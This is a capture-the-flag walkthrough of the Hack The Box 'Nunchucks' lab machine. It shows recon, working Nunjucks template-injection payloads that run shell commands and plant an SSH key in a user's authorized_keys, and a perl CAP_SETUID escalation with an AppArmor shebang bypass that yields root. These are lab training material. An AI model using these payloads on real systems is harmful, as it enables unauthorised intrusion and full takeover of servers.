Nunchucks - Easy

Introduction@Nunchucks:~$
Name
IP
10.10.11.122
Points
40
OS
Linux
Difficulty
Easy
Creator
Release Date
02 / Nov / 2021
Recon
Nmap
┌─[sheinn101@parrot]─[~/htb/nunchucks]
└──╼ [??]$ cat nmap.out
# Nmap 7.92 scan initiated Wed Nov 3 15:20:27 2021 as: nmap -sC -sV -oN nmap.out 10.10.11.122
Nmap scan report for 10.10.11.122
Host is up (0.42s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA)
| 256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA)
|_ 256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_http-trane-info: Problem with XML parsing of /evox/about
| tls-nextprotoneg:
|_ http/1.1
| ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb
| Not valid before: 2021-08-30T15:42:24
|_Not valid after: 2031-08-28T15:42:24
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 3 15:21:19 2021 -- 1 IP address (1 host up) scanned in 52.42 seconds
Only 3 Ports are opened and we can see a DNS name nunchucks.htb
. So add our /etc/hosts
echo 10.10.11.122 nunchucks.htb | sudo tee -a /etc/hosts
Web

I tried directory bruteforce but noting interesting. There is also a signup page which is currently closed. So noting much we can do. Let's find vhosts
for this.
Finding Vhosts
┌─[sheinn101@parrot]─[~/htb/nunchucks]
└──╼ [??]$ ffuf -u https://FUZZ.nunchucks.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : https://FUZZ.nunchucks.htb
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
store [Status: 200, Size: 4029, Words: 1053, Lines: 102]
Found a subdomain called store.nunchucks.htb
. Add this again to /etc/hosts
If we go this domain, we can see another web page running Express
which is Javascript Framework.

When we enter an email and click on Notify Me
, It will reflected a message to us.

So I tried SSTI
like this.

Now we can confirmed there is Server Site Template Injection
.
After wasting some times in google , I found a website that we can get code execution
for Nunchucks Template Engine
.
Intercept with Burp
and enter payload like this
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}@gmail.com
Note: if you copy from original website, don't forget to esacpe double quote.

Now we get the content of /etc/passwd
.
Getting User David
I generate ssh-key with ssh-keygen
in my localhost.
┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh-keygen -f david
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in david
Your public key has been saved in david.pub
The key fingerprint is:
SHA256:zhOVx8gBnLp4OWrXr3ErJzzFxCnmWguQqm/jIRMpSOk sheinn101@parrot
The key's randomart image is:
+---[RSA 3072]----+
| ..o. |
| . o. = |
| o . . .=.o |
|+. o . o.+. |
|=E . o =S+ |
|... . *oo.o |
|o.. o B=o. |
|.oo.o o B+.. |
| +oo . .Bo |
+----[SHA256]-----+
Put it our ssh public key to /home/david/.ssh/authorized_keys.
{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo "YOUR SSH PUBLIC KEY" > /home/david/.ssh/authorized_keys')\")()}}@gmail.com"}
And then we can login with ssh
.
┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh -i david david@10.10.11.122
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-86-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 8 Nov 05:50:27 UTC 2021
System load: 0.0 Processes: 230
Usage of /: 48.8% of 6.82GB Users logged in: 0
Memory usage: 48% IPv4 address for ens160: 10.10.11.122
Swap usage: 0%
10 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Oct 22 19:09:52 2021 from 10.10.14.6
david@nunchucks:~$ ls
user.txt
david@nunchucks:~$ cat user.txt
d5beec8da1********65e4f46a2a6a
david@nunchucks:~$
Privilege Escalaption
After some enumerating, there is some interesting file in /opt
directory
david@nunchucks:/opt$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Oct 28 17:03 .
drwxr-xr-x 19 root root 4096 Oct 28 17:03 ..
-rwxr-xr-x 1 root root 838 Sep 1 12:53 backup.pl
drwxr-xr-x 2 root root 4096 Oct 28 17:03 web_backups
david@nunchucks:/opt$
backup.pl
#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid);
POSIX::setuid(0);
my $tmpdir = "/tmp";
my $backup_main = '/var/www';
my $now = strftime("%Y-%m-%d-%s", localtime);
my $tmpbdir = "$tmpdir/backup_$now";
sub printlog
{
print "[", strftime("%D %T", localtime), "] $_[0]\n";
}
sub archive
{
printlog "Archiving...";
system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null");
printlog "Backup complete in $tmpbdir/backup_$now.tar";
}
if ($> != 0) {
die "You must run this script as root.\n";
}
printlog "Backup starts.";
mkdir($tmpbdir);
&archive;
printlog "Moving $tmpbdir/backup_$now to /opt/web_backups";
system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/");
printlog "Removing temporary directory";
rmdir($tmpbdir);
printlog "Completed";
This script is seem like to backup files into web_backups
directory which is owned by root.
It' s also using POSIX::setuid(0);
to run as root but It must be SUID or capability.
As a linpeas
output ,we can see it has CAP_SETUID.

You can also check wit this command : getcap -r / 2>/dev/null
GTFObin
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
I run this one line command from GTFObin but it not worked.When we try to run whoami
It will return as root, we can't even read root.txt
, it said permission denied.
david@nunchucks:/opt$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
root
david@nunchucks:/opt$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "cat /root/root.txt";'
cat: /root/root.txt: Permission denied
david@nunchucks:/opt$
But when we create this one line command into a script and run it.
david@nunchucks:/tmp$ cat pwned.pl
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash";
david@nunchucks:/tmp$ chmod +x pwned.pl
david@nunchucks:/tmp$ ./pwned.pl
root@nunchucks:/tmp# id
uid=0(root) gid=1000(david) groups=1000(david)
root@nunchucks:/tmp# cat /root/root.txt
cf715d729***********b1aac2ebdd9e
Now we get a shell as root.
Note: But we can' execute like this. It said permission denied.
david@nunchucks:/tmp$ perl pwned.pl
Can't open perl script "pwned.pl": Permission denied
david@nunchucks:/tmp$
This is weird. I tried to search on Google
and I found an Article about this. If a script including the shebang
of the restricted application is used, then the script will not be allocated the same restrictions and will be executed as shown in the link. Knowing that we can execute scripts with the shebang and they won't apply the AppArmor profile to the script. That's it.

Author Account : https://app.hackthebox.com/profile/237587
Last updated